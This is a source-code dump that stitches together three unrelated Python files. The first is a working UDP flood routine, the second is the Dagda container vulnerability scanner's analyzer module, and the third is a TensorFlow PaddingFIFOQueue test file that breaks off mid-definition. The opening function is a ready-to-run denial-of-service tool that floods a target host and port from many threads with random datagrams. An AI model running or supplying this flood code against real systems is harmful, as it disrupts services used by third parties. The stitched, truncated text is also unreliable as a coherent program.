# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import random
import time
import socket
from threading import Thread
def UDP_ATTACK(threads, attack_time, target):
# Shared flag used to signal the flood threads to stop
global FINISH
FINISH = False
target_ip = target.split(":")[0]
target_port = int(target.split(":")[1])
print("\033[1;34m"+"[*]"+"\033[0m"+" Starting UDP attack...")
threads_list = []
# UDP flood
def udp_flood():
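# Each worker loops until FINISH is set, sending bursts of 16
# random-sized UDP datagrams to the target.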
global FINISH
# Create socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
while True:
if FINISH:
break
# Send random payload
try:
for _ in range(16):
payload = os.urandom(random.randint(1, 60))
sock.sendto(payload, (target_ip, target_port))
except Exception as e:
print(e)
else:
print("\033[1;32m"+"[+]"+"\033[0m"+" UDP packet with size " + str(len(payload)) + " was sent!")
# Start threads
for thread in range(threads):
print("\033[1;34m"+"[*]"+"\033[0m"+" Staring thread " + str(thread)+ "...")
t = Thread(target = udp_flood)
t.start()
threads_list.append(t)
# Sleep for the selected attack duration
time.sleep(attack_time)
# Signal all threads to stop, then wait for them to finish
FINISH = True
for thread in threads_list:
thread.join()
print("\033[1;77m"+"[i]"+"\033[0m"+" Attack completed.")
|
analyzer.py | #
# Licensed to Dagda under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Dagda licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import datetime
import requests
import json
import traceback
from threading import Thread
from analysis.static.os import os_info_extractor
from analysis.static.dependencies import dep_info_extractor
from analysis.static.av import malware_extractor
from api.internal.internal_server import InternalServer
from log.dagda_logger import DagdaLogger
from analysis.static.util.utils import extract_filesystem_bundle
from analysis.static.util.utils import clean_up
# Analyzer class
class Analyzer:
# -- Public methods
# Analyzer Constructor
def __init__(self, dagda_server_url=None):
super(Analyzer, self).__init__()
self.is_remote = False
if dagda_server_url is not None:
self.dagda_server_url = dagda_server_url
self.is_remote = True
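# Remote mode: vulnerability and false-positive lookups are delegated
# to the Dagda server's REST API instead of a local MongoDB driver.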
else:
self.mongoDbDriver = InternalServer.get_mongodb_driver()
self.dockerDriver = InternalServer.get_docker_driver()
# Evaluate image from image name or container id
def evaluate_image(self, image_name, container_id):
if InternalServer.is_debug_logging_enabled():
DagdaLogger.get_logger().debug('ENTRY to the method for analyzing a docker image')
# Init
data = {}
# -- Static analysis
image_name = self.dockerDriver.get_docker_image_name_by_container_id(container_id) if container_id \
else image_name
os_packages = []
malware_binaries = []
dependencies = []
temp_dir = None
try:
# Get OS packages
if InternalServer.is_debug_logging_enabled():
DagdaLogger.get_logger().debug('Retrieving OS packages from the docker image ...')
if container_id is None: # Scans the docker image
os_packages = os_info_extractor.get_soft_from_docker_image(docker_driver=self.dockerDriver,
image_name=image_name)
temp_dir = extract_filesystem_bundle(docker_driver=self.dockerDriver,
image_name=image_name)
else: # Scans the docker container
os_packages = os_info_extractor.get_soft_from_docker_container_id(docker_driver=self.dockerDriver,
container_id=container_id)
temp_dir = extract_filesystem_bundle(docker_driver=self.dockerDriver,
container_id=container_id)
if InternalServer.is_debug_logging_enabled():
DagdaLogger.get_logger().debug('OS packages from the docker image retrieved')
# Get malware binaries in a parallel way
malware_thread = Thread(target=Analyzer._threaded_malware, args=(self.dockerDriver, temp_dir,
malware_binaries))
malware_thread.start()
# Get programming language dependencies in a parallel way (currently disabled)
# dependencies_thread = Thread(target=Analyzer._threaded_dependencies,
#                              args=(self.dockerDriver, image_name, temp_dir, dependencies))
# dependencies_thread.start()
# Waiting for the threads
malware_thread.join()
# dependencies_thread.join()
except Exception as ex:
message = "Unexpected exception of type {0} occurred: {1!r}"\
.format(type(ex).__name__, ex.get_message() if type(ex).__name__ == 'DagdaError' else ex.args)
DagdaLogger.get_logger().error(message)
if InternalServer.is_debug_logging_enabled():
traceback.print_exc()
data['status'] = message
# -- Cleanup
if temp_dir is not None:
clean_up(temporary_dir=temp_dir)
# -- Prepare output
if InternalServer.is_debug_logging_enabled():
DagdaLogger.get_logger().debug('Preparing analysis output ...')
if 'status' not in data or data['status'] is None:
data['status'] = 'Completed'
data['image_name'] = image_name
data['timestamp'] = datetime.datetime.now().timestamp()
data['static_analysis'] = self.generate_static_analysis(image_name, os_packages, dependencies, malware_binaries)
if InternalServer.is_debug_logging_enabled():
DagdaLogger.get_logger().debug('Analysis output completed')
# -- Return
if InternalServer.is_debug_logging_enabled():
DagdaLogger.get_logger().debug('EXIT from the method for analyzing a docker image')
return data
# Generates the result of the static analysis
def generate_static_analysis(self, image_name, os_packages, dependencies, malware_binaries):
data = {}
data['os_packages'] = self.generate_os_report(image_name, os_packages)
data['prog_lang_dependencies'] = self.generate_dependencies_report(image_name, dependencies)
data['malware_binaries'] = malware_binaries
return data
# Generates dependencies report
def generate_dependencies_report(self, image_name, dependencies):
data = {}
dep_details = {}
dep_details['java'] = []
dep_details['python'] = []
dep_details['nodejs'] = []
dep_details['js'] = []
dep_details['ruby'] = []
dep_details['php'] = []
fp_count = 0
for dependency in dependencies:
d = {}
splitted_dep = dependency.split("#")
d['product'] = splitted_dep[1]
d['version'] = splitted_dep[2]
d['product_file_path'] = splitted_dep[3]
d['vulnerabilities'] = self.get_vulnerabilities(d['product'], d['version'])
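# Every reported dependency is flagged as vulnerable; only false
# positives reduce the vuln_dependencies count below.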
d['is_vulnerable'] = True
d['is_false_positive'] = self.is_fp(image_name, d['product'], d['version'])
if d['is_false_positive']:
fp_count += 1
dep_details[splitted_dep[0]].append(d)
# Prepare output
data['vuln_dependencies'] = len(dep_details['java']) + len(dep_details['python']) + \
len(dep_details['nodejs']) + len(dep_details['js']) + \
len(dep_details['ruby']) + len(dep_details['php']) - fp_count
data['dependencies_details'] = dep_details
# Return
return data
# Generates os report
def generate_os_report(self, image_name, os_packages):
data = {}
products_status = []
vuln_products = 0
fp_count = 0
for package in os_packages:
p = {}
p['product'] = package['product']
p['version'] = package['version']
p['vulnerabilities'] = self.get_vulnerabilities(package['product'], package['version'])
if len(p['vulnerabilities']) > 0:
p['is_vulnerable'] = True
vuln_products += 1
else:
p['is_vulnerable'] = False
p['is_false_positive'] = self.is_fp(image_name, package['product'], package['version'])
if p['is_false_positive']:
fp_count += 1
products_status.append(p)
# Prepare output
vuln_products -= fp_count
data['total_os_packages'] = len(products_status)
data['vuln_os_packages'] = vuln_products
data['ok_os_packages'] = data['total_os_packages'] - vuln_products
data['os_packages_details'] = products_status
# Return
return data
# Gets vulnerabilities by product and version
def get_vulnerabilities(self, product, version):
if not self.is_remote:
return self.mongoDbDriver.get_vulnerabilities(product, version)
else:
if product is not None:
product += '/' + version
r = requests.get(self.dagda_server_url + '/vuln/products/' + product)
if r.status_code == 200:
return json.loads(r.content.decode('utf-8'))
return []
# Check if it is a false positive
def is_fp(self, image_name, product, version):
if not self.is_remote:
return self.mongoDbDriver.is_fp(image_name, product, version)
else:
if product is not None:
product += '/' + version
r = requests.get(self.dagda_server_url + '/history/' + image_name + '/fp/' + product)
return r.status_code == 204
# Get malware binaries thread
@staticmethod
def _threaded_malware(dockerDriver, temp_dir, malware_binaries):
# Get malware binaries
if InternalServer.is_debug_logging_enabled():
DagdaLogger.get_logger().debug('Retrieving malware files from the docker image ...')
malware_binaries.extend(malware_extractor.get_malware_included_in_docker_image(docker_driver=dockerDriver,
temp_dir=temp_dir))
if InternalServer.is_debug_logging_enabled():
DagdaLogger.get_logger().debug('Malware files from the docker image retrieved')
# Get programming language dependencies thread
@staticmethod
def _threaded_dependencies(dockerDriver, image_name, temp_dir, dependencies):
# Get programming language dependencies
if InternalServer.is_debug_logging_enabled():
DagdaLogger.get_logger().debug('Retrieving dependencies from the docker image ...')
dependencies.extend(dep_info_extractor.get_dependencies_from_docker_image(docker_driver=dockerDriver,
image_name=image_name,
temp_dir=temp_dir))
if InternalServer.is_debug_logging_enabled():
DagdaLogger.get_logger().debug('Dependencies from the docker image retrieved')
|
padding_fifo_queue_test.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.data_flow_ops.PaddingFIFOQueue."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import time
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes as dtypes_lib
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.platform import test
@test_util.run_v1_only("PaddingFIFOQueue removed from v2")
class PaddingFIFOQueueTest(test.TestCase):
def testConstructor(self):
with ops.Graph().as_default():
q = data_flow_ops.PaddingFIFOQueue(
10, dtypes_lib.float32, ((None,),), name="Q")
self.assertTrue(isinstance(q.queue_ref, ops.Tensor))
self.assertProtoEquals("""
name:'Q' op:'PaddingFIFOQueueV2'
attr { key: 'component_types' value { list { type: DT_FLOAT } } }
attr { key: 'shapes' value { list { shape { dim { size: -1 } } } } }
attr { key: 'capacity' value { i: 10 } }
attr { key: 'container' value { s: '' } }
attr { key: 'shared_name' value { s: '' } }
""", q.queue_ref.op.node_def)
def testMultiQueueConstructor(self):
with ops.Graph().as_default():
q = data_flow_ops.PaddingFIFOQueue(
5, (dtypes_lib.int32, dtypes_lib.float32), ((), ()),
shared_name="foo",
name="Q")
self.assertTrue(isinstance(q.queue_ref, ops.Tensor))
self.assertProtoEquals("""
name:'Q' op:'PaddingFIFOQueueV2'
attr { key: 'component_types' value { list {
type: DT_INT32 type : DT_FLOAT
} } }
attr { key: 'shapes' value { list { shape { } shape { } } } }
attr { key: 'capacity' value { i: 5 } }
attr { key: 'container' value { s: '' } }
attr { key: 'shared_name' value { s: 'foo' } }
""", q.queue_ref.op.node_def)
def testConstructorWithShapes(self):
with ops.Graph().as_default():
q = data_flow_ops.PaddingFIFOQueue(
5, (dtypes_lib.int32, dtypes_lib.float32),
shapes=(tensor_shape.TensorShape([1, 1, 2, 3]),
tensor_shape.TensorShape([5, 8])),
name="Q")
self.assertTrue(isinstance(q.queue_ref, ops.Tensor))
self.assertProtoEquals("""
name:'Q' op:'PaddingFIFOQueueV2'
attr { key: 'component_types' value { list {
type: DT_INT32 type : DT_FLOAT
} } }
attr { key: 'shapes' value { list {
shape { dim { size: 1 }
dim { size: 1 }
dim { size: 2 }
dim { size: 3 } }
shape { dim { size: 5 }
dim { size: 8 } }
} } }
attr { key: 'capacity' value { i: 5 } }
attr { key: 'container' value { s: '' } }
attr { key: 'shared_name' value { s: '' } }
""", q.queue_ref.op.node_def)
def testEnqueue(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
enqueue_op = q.enqueue((10.0,))
enqueue_op.run()
def testEnqueueWithShape(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(
10, dtypes_lib.float32, shapes=((3, 2),))
enqueue_correct_op = q.enqueue(([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]],))
enqueue_correct_op.run()
with self.assertRaises(ValueError):
q.enqueue(([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]],))
self.assertEqual(1, q.size().eval())
def testEnqueueManyWithShape(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(
10, [dtypes_lib.int32, dtypes_lib.int32], shapes=[(), (2,)])
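# enqueue_many splits its inputs along dimension 0, producing four
# (scalar, pair) elements here.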
q.enqueue_many([[1, 2, 3, 4], [[1, 1], [2, 2], [3, 3], [4, 4]]]).run()
self.assertEqual(4, q.size().eval())
def testParallelEnqueue(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Run one producer thread for each element in elems.
def enqueue(enqueue_op):
self.evaluate(enqueue_op)
threads = [
self.checkedThread(
target=enqueue, args=(e,)) for e in enqueue_ops
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# Dequeue every element using a single thread.
results = []
for _ in xrange(len(elems)):
results.append(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testParallelDequeue(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Enqueue every element using a single thread.
for enqueue_op in enqueue_ops:
enqueue_op.run()
# Run one consumer thread for each element in elems.
results = []
def dequeue():
results.append(self.evaluate(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in enqueue_ops]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, results)
def testDequeue(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
for i in xrange(len(elems)):
vals = self.evaluate(dequeued_t)
self.assertEqual([elems[i]], vals)
def testEnqueueAndBlockingDequeue(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(3, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
def enqueue():
# The enqueue_ops should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
for enqueue_op in enqueue_ops:
self.evaluate(enqueue_op)
results = []
def dequeue():
for _ in xrange(len(elems)):
results.append(self.evaluate(dequeued_t))
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
for elem, result in zip(elems, results):
self.assertEqual([elem], result)
def testMultiEnqueueAndDequeue(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(10,
(dtypes_lib.int32, dtypes_lib.float32),
((), ()))
elems = [(5, 10.0), (10, 20.0), (15, 30.0)]
enqueue_ops = [q.enqueue((x, y)) for x, y in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
for i in xrange(len(elems)):
x_val, y_val = self.evaluate(dequeued_t)
x, y = elems[i]
self.assertEqual([x], x_val)
self.assertEqual([y], y_val)
def testQueueSizeEmpty(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
self.assertEqual([0], q.size().eval())
def testQueueSizeAfterEnqueueAndDequeue(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue()
size = q.size()
self.assertEqual([], size.get_shape())
enqueue_op.run()
self.assertEqual(1, self.evaluate(size))
dequeued_t.op.run()
self.assertEqual(0, self.evaluate(size))
def testEnqueueMany(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
for i in range(8):
vals = self.evaluate(dequeued_t)
self.assertEqual([elems[i % 4]], vals)
def testEmptyEnqueueMany(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, (
(None, None),))
empty_t = constant_op.constant(
[], dtype=dtypes_lib.float32, shape=[0, 2, 3])
enqueue_op = q.enqueue_many((empty_t,))
size_t = q.size()
self.assertEqual([0], self.evaluate(size_t))
enqueue_op.run()
self.assertEqual([0], self.evaluate(size_t))
def testEmptyDequeueMany(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, shapes=((),))
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue_many(0)
self.assertEqual([], self.evaluate(dequeued_t).tolist())
enqueue_op.run()
self.assertEqual([], self.evaluate(dequeued_t).tolist())
def testEmptyDequeueManyWithDynamicShape(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(
10, dtypes_lib.float32, shapes=((None,),))
enqueue_op = q.enqueue(([10.0],))
dequeued_t = q.dequeue_many(0)
self.assertEqual([], self.evaluate(dequeued_t).tolist())
enqueue_op.run()
self.assertEqual([], self.evaluate(dequeued_t).tolist())
def testEmptyDequeueUpToWithDynamicShape(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(
10, dtypes_lib.float32, shapes=((None,),))
enqueue_op = q.enqueue(([10.0],))
dequeued_t = q.dequeue_up_to(0)
self.assertEqual([], self.evaluate(dequeued_t).tolist())
enqueue_op.run()
self.assertEqual([], self.evaluate(dequeued_t).tolist())
def testConstructPaddingFIFOQueueWithNoShape(self):
with self.cached_session():
with self.assertRaisesRegexp(
ValueError,
r"When providing partial shapes, a list of shapes must be provided."):
data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32,
None).queue_ref.eval()
def testMultiEnqueueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(10,
(dtypes_lib.float32, dtypes_lib.int32),
((), (2,)))
float_elems = [10.0, 20.0, 30.0, 40.0]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
for i in range(8):
float_val, int_val = self.evaluate(dequeued_t)
self.assertEqual(float_elems[i % 4], float_val)
self.assertAllEqual(int_elems[i % 4], int_val)
def testMultiEnqueueManyWithPartiallyKnownShapes(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(
10, (dtypes_lib.float32, dtypes_lib.int32), shapes=((), (None,)))
float_elems = [10.0, 20.0, 30.0, 40.0]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
for i in range(8):
float_val, int_val = self.evaluate(dequeued_t)
self.assertEqual(float_elems[i % 4], float_val)
self.assertAllEqual(int_elems[i % 4], int_val)
def testDequeueMany(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(4)
enqueue_op.run()
self.assertAllEqual(elems[0:4], self.evaluate(dequeued_t))
self.assertAllEqual(elems[4:8], self.evaluate(dequeued_t))
def testDequeueUpToNoBlocking(self):
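# dequeue_up_to behaves like dequeue_many while enough elements are
# queued; it only returns fewer when the queue has been closed.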
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(4)
enqueue_op.run()
self.assertAllEqual(elems[0:4], self.evaluate(dequeued_t))
self.assertAllEqual(elems[4:8], self.evaluate(dequeued_t))
def testMultiDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(
10, (dtypes_lib.float32, dtypes_lib.int32), shapes=((), (2,)))
float_elems = [
10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0
]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14],
[15, 16], [17, 18], [19, 20]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue_many(4)
dequeued_single_t = q.dequeue()
enqueue_op.run()
float_val, int_val = self.evaluate(dequeued_t)
self.assertAllEqual(float_elems[0:4], float_val)
self.assertAllEqual(int_elems[0:4], int_val)
self.assertEqual(float_val.shape, dequeued_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_t[1].get_shape())
float_val, int_val = self.evaluate(dequeued_t)
self.assertAllEqual(float_elems[4:8], float_val)
self.assertAllEqual(int_elems[4:8], int_val)
float_val, int_val = self.evaluate(dequeued_single_t)
self.assertAllEqual(float_elems[8], float_val)
self.assertAllEqual(int_elems[8], int_val)
self.assertEqual(float_val.shape, dequeued_single_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_single_t[1].get_shape())
def testMultiDequeueManyWithPartiallyKnownShapes(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(
10, (dtypes_lib.float32, dtypes_lib.int32), shapes=((), (None,)))
float_elems = [
10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0
]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14],
[15, 16], [17, 18], [19, 20]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue_many(4)
dequeued_single_t = q.dequeue()
enqueue_op.run()
float_val, int_val = self.evaluate(dequeued_t)
self.assertAllEqual(float_elems[0:4], float_val)
self.assertAllEqual(int_elems[0:4], int_val)
self.assertTrue(
tensor_shape.TensorShape(float_val.shape).is_compatible_with(
dequeued_t[0].get_shape()))
self.assertTrue(
tensor_shape.TensorShape(int_val.shape).is_compatible_with(dequeued_t[
1].get_shape()))
float_val, int_val = self.evaluate(dequeued_t)
self.assertAllEqual(float_elems[4:8], float_val)
self.assertAllEqual(int_elems[4:8], int_val)
float_val, int_val = self.evaluate(dequeued_single_t)
self.assertAllEqual(float_elems[8], float_val)
self.assertAllEqual(int_elems[8], int_val)
self.assertTrue(
tensor_shape.TensorShape(float_val.shape).is_compatible_with(
dequeued_single_t[0].get_shape()))
self.assertTrue(
tensor_shape.TensorShape(int_val.shape).is_compatible_with(
dequeued_single_t[1].get_shape()))
def testMultiDequeueManyWithPartiallyKnownShapesAndVariableSizeInput(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(
10, (dtypes_lib.string, dtypes_lib.int32),
shapes=((None,), (1, None)))
str_elems = [["a"], ["ab"], ["abc"], ["abc", "d"], ["abc", "d", "e"],
["abc", "d", "e", "f"]]
int_elems = [[[1]], [[2]], [[3]], [[1, 2]], [[1, 2, 3]], [[1, 2, 3, 4]]]
enqueue_ops = [q.enqueue((str_elems[i], int_elems[i])) for i in range(6)]
dequeued_t = q.dequeue_many(5)
dequeued_single_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
string_val, int_val = self.evaluate(dequeued_t)
self.assertAllEqual([[b"a", b"", b""], [b"ab", b"", b""],
[b"abc", b"", b""], [b"abc", b"d", b""],
[b"abc", b"d", b"e"]], string_val)
self.assertAllEqual([[[1, 0, 0]], [[2, 0, 0]], [[3, 0, 0]], [[1, 2, 0]],
[[1, 2, 3]]], int_val)
self.assertTrue(
tensor_shape.TensorShape(string_val.shape).is_compatible_with(
dequeued_t[0].get_shape()))
self.assertTrue(
tensor_shape.TensorShape(int_val.shape).is_compatible_with(dequeued_t[
1].get_shape()))
string_val, int_val = self.evaluate(dequeued_single_t)
self.assertAllEqual([b"abc", b"d", b"e", b"f"], string_val)
self.assertAllEqual([[1, 2, 3, 4]], int_val)
self.assertTrue(
tensor_shape.TensorShape(string_val.shape).is_compatible_with(
dequeued_single_t[0].get_shape()))
self.assertTrue(
tensor_shape.TensorShape(int_val.shape).is_compatible_with(
dequeued_single_t[1].get_shape()))
def testMultiDequeueUpToPartiallyKnownShapesAndVariableInputNoBlocking(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(
10, (dtypes_lib.string, dtypes_lib.int32),
shapes=((None,), (1, None)))
str_elems = [["a"], ["ab"], ["abc"], ["abc", "d"], ["abc", "d", "e"],
["abc", "d", "e", "f"]]
int_elems = [[[1]], [[2]], [[3]], [[1, 2]], [[1, 2, 3]], [[1, 2, 3, 4]]]
enqueue_ops = [q.enqueue((str_elems[i], int_elems[i])) for i in range(6)]
dequeued_t = q.dequeue_up_to(5)
dequeued_single_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
string_val, int_val = self.evaluate(dequeued_t)
self.assertAllEqual([[b"a", b"", b""], [b"ab", b"", b""],
[b"abc", b"", b""], [b"abc", b"d", b""],
[b"abc", b"d", b"e"]], string_val)
self.assertAllEqual([[[1, 0, 0]], [[2, 0, 0]], [[3, 0, 0]], [[1, 2, 0]],
[[1, 2, 3]]], int_val)
self.assertTrue(
tensor_shape.TensorShape(string_val.shape).is_compatible_with(
dequeued_t[0].get_shape()))
self.assertTrue(
tensor_shape.TensorShape(int_val.shape).is_compatible_with(dequeued_t[
1].get_shape()))
string_val, int_val = self.evaluate(dequeued_single_t)
self.assertAllEqual([b"abc", b"d", b"e", b"f"], string_val)
self.assertAllEqual([[1, 2, 3, 4]], int_val)
self.assertTrue(
tensor_shape.TensorShape(string_val.shape).is_compatible_with(
dequeued_single_t[0].get_shape()))
self.assertTrue(
tensor_shape.TensorShape(int_val.shape).is_compatible_with(
dequeued_single_t[1].get_shape()))
def testHighDimension(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.int32, ((4, 4, 4, 4),))
elems = np.array([[[[[x] * 4] * 4] * 4] * 4 for x in range(10)], np.int32)
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(10)
enqueue_op.run()
self.assertAllEqual(dequeued_t.eval(), elems)
def testPartiallyKnownHighDimension(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.int32, (
(4, None, 4, None),))
elems = np.array([[[[[x] * 4] * 4] * 4] * 4 for x in range(10)], np.int32)
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(10)
enqueue_op.run()
self.assertAllEqual(dequeued_t.eval(), elems)
def testEnqueueWrongShape(self):
q = data_flow_ops.PaddingFIFOQueue(10, (dtypes_lib.int32, dtypes_lib.int32),
((), (2,)))
with self.assertRaises(ValueError):
q.enqueue(([1, 2], [2, 2]))
with self.assertRaises(ValueError):
q.enqueue_many((7, [[1, 2], [3, 4], [5, 6]]))
def testBatchSizeMismatch(self):
q = data_flow_ops.PaddingFIFOQueue(10, (dtypes_lib.int32, dtypes_lib.int32,
dtypes_lib.int32), ((), (), ()))
with self.assertRaises(ValueError):
q.enqueue_many(([1, 2, 3], [1, 2], [1, 2, 3]))
with self.assertRaises(ValueError):
q.enqueue_many(
([1, 2, 3], [1, 2], array_ops.placeholder(dtypes_lib.int32)))
with self.assertRaises(ValueError):
q.enqueue_many(
(array_ops.placeholder(dtypes_lib.int32), [1, 2], [1, 2, 3]))
def testEnqueueManyEmptyTypeConversion(self):
q = data_flow_ops.PaddingFIFOQueue(10,
(dtypes_lib.int32, dtypes_lib.float32), (
(), ()))
enq = q.enqueue_many(([], []))
self.assertEqual(dtypes_lib.int32, enq.inputs[1].dtype)
self.assertEqual(dtypes_lib.float32, enq.inputs[2].dtype)
def testEnqueueWrongType(self):
q = data_flow_ops.PaddingFIFOQueue(10,
(dtypes_lib.int32, dtypes_lib.float32), (
(), ()))
with self.assertRaises(ValueError):
q.enqueue((array_ops.placeholder(dtypes_lib.int32),
array_ops.placeholder(dtypes_lib.int32)))
with self.assertRaises(ValueError):
q.enqueue_many((array_ops.placeholder(dtypes_lib.int32),
array_ops.placeholder(dtypes_lib.int32)))
def testEnqueueWrongPartiallyKnownShapeAtRuntime(self):
with self.cached_session() as sess:
# First dimension of second component is unknown, second
# dimension must be 3.
q = data_flow_ops.PaddingFIFOQueue(10,
(dtypes_lib.int32, dtypes_lib.int32), (
(2, 2), (None, 3)))
elems_ok = np.array([1] * 4).reshape((2, 2)).astype(np.int32)
elems_bad = array_ops.placeholder(dtypes_lib.int32)
enqueue_op = q.enqueue((elems_ok, elems_bad))
with self.assertRaisesRegexp(errors_impl.InvalidArgumentError,
r"Expected \[\?,3\], got \[3,4\]"):
sess.run([enqueue_op],
feed_dict={elems_bad: np.array([1] * 12).reshape((3, 4))})
def testEnqueueDequeueManyWrongPartiallyKnownShape(self):
